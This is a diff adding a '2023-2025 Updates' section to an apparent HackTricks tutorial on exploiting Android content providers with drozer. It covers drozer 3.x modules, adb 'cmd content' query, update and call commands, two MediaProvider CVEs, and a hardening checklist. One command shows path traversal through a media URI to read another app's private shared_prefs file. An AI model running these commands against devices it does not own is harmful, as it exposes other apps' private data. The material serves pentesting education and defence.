diff --git a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 3189ea98e..f8953fd15 100644 --- a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -191,13 +191,72 @@ Vulnerable Providers: content://com.mwr.example.sieve.FileBackupProvider ``` +## 2023-2025 Updates & Modern Tips + +### Drozer 3.x (Python 3) is out + +WithSecure resumed maintenance of drozer in 2022 and ported the framework to **Python 3** (latest **3.1.0 – April 2024**). +Besides compatibility fixes, new modules that are particularly useful when working with Content Providers include: + +* `scanner.provider.exported` – list only providers with `android:exported="true"`. +* `app.provider.grant` – automatically call `grantUriPermission()` so you can talk to providers that expect `FLAG_GRANT_READ_URI_PERMISSION` / `FLAG_GRANT_WRITE_URI_PERMISSION` on Android 12+. +* Better handling of **Scoped Storage** so file-based providers on Android 11+ can still be reached. + +Upgrade (host & agent): + +```bash +pipx install --force "git+https://github.com/WithSecureLabs/drozer@v3.1.0" +adb install drozer-agent-3.1.0.apk +``` + +### Using the built-in `cmd content` helper (ADB ≥ 8.0) + +All modern Android devices ship with a CLI that can query/update providers **without installing any agent**: + +```bash +adb shell cmd content query --uri content://com.test.provider/items/ +adb shell cmd content update --uri content://com.test.provider/items/1 \ + --bind price:d:1337 +adb shell cmd content call --uri content://com.test.provider \ + --method evilMethod --arg 'foo' +``` + +Combine it with `run-as ` or a rooted shell to test internal-only providers. + +### Recent real-world CVEs that abused Content Providers + +| CVE | Year | Component | Bug class | Impact | +|-----|------|-----------|-----------|--------| +| CVE-2024-43089 | 2024 | MediaProvider | Path traversal in `openFile()` | Arbitrary file read from any app’s private storage | +| CVE-2023-35670 | 2023 | MediaProvider | Path traversal | Information disclosure | + +Re-create CVE-2024-43089 on a vulnerable build: + +```bash +adb shell cmd content read \ + --uri content://media/external_primary/file/../../data/data/com.target/shared_prefs/foo.xml +``` + +### Hardening checklist for API 30+ + +* Declare `android:exported="false"` unless the provider **must** be public – from API 31 the attribute is mandatory. +* Enforce **permissions** and/or `android:grantUriPermissions="true"` instead of exporting the whole provider. +* Whitelist allowed `projection`, `selection` and `sortOrder` arguments (e.g. build queries with `SQLiteQueryBuilder.setProjectionMap`). +* In `openFile()` canonicalise the requested path (`FileUtils`) and reject `..` sequences to prevent traversal. +* When exposing files prefer **Storage Access Framework** or a `FileProvider`. + +These changes in recent Android versions mean many legacy exploitation primitives still work, but require additional flags/permissions that the updated drozer modules or `cmd content` helper can apply automatically. + ## References - [https://www.tutorialspoint.com/android/android_content_providers.htm](https://www.tutorialspoint.com/android/android_content_providers.htm) - [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/) - [https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf) +- [https://github.com/WithSecureLabs/drozer/releases/tag/3.1.0](https://github.com/WithSecureLabs/drozer/releases/tag/3.1.0) +- [https://source.android.com/security/bulletin/2024-07-01](https://source.android.com/security/bulletin/2024-07-01) {{#include ../../../banners/hacktricks-training.md}} +